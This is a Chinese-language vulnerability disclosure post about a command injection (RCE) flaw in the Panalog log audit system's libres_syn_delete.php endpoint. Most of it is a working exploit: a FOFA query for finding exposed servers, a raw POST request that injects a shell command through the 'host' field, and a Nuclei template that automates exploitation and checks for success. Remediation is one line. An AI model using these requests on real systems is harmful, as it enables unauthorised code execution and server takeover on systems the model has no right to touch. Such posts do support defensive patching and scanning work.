免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
Ⅰ、漏洞描述
Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务
Panalog 日志审计系统 libres_syn_delete.php接口处存在RCE漏洞,恶意攻击者可能会利用此漏洞执行恶意代码,最终导致服务器失陷。
影响范围
version <= MARS r10p1Free

Ⅱ、fofa语句
app="Panabit-Panalog"
Ⅲ、漏洞复现
POC
- POST /content-apply/libres_syn_delete.php HTTP/1.1
- Host: 1270.0.1
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- Content-Type: application/x-www-form-urlencoded
- Accept-Encoding: gzip
- Connection: close
-
- token=1&id=2&host=| echo "Hello World!" >ceshi.txt
1、构建poc

2、访问
https://127.0.0.1/content-apply/ceshi.txt

Ⅳ、Nuclei-POC
- id: Panalog-RCE
-
- info:
- name: Panalog 日志审计系统 libres_syn_delete.php接口处存在RCE漏洞,恶意攻击者可能会利用此漏洞执行恶意代码,最终导致服务器失陷。
- author: WLF
- severity: high
- metadata:
- fofa-query: app="Panabit-Panalog"
- variables:
- filename: "{{to_lower(rand_base(10))}}"
- boundary: "{{to_lower(rand_base(20))}}"
- http:
- - raw:
- - |
- POST /content-apply/libres_syn_delete.php HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- Content-Type: application/x-www-form-urlencoded
- Accept-Encoding: gzip
- Connection: close
-
- token=1&id=2&host=| echo "Hello World!" >{{filename}}.txt
-
- - |
- GET /content-apply/{{filename}}.txt HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
-
-
-
- matchers:
- - type: dsl
- dsl:
- - status_code==200 && contains_all(body,"Hello World!")

Ⅴ、修复建议
升级至安全版本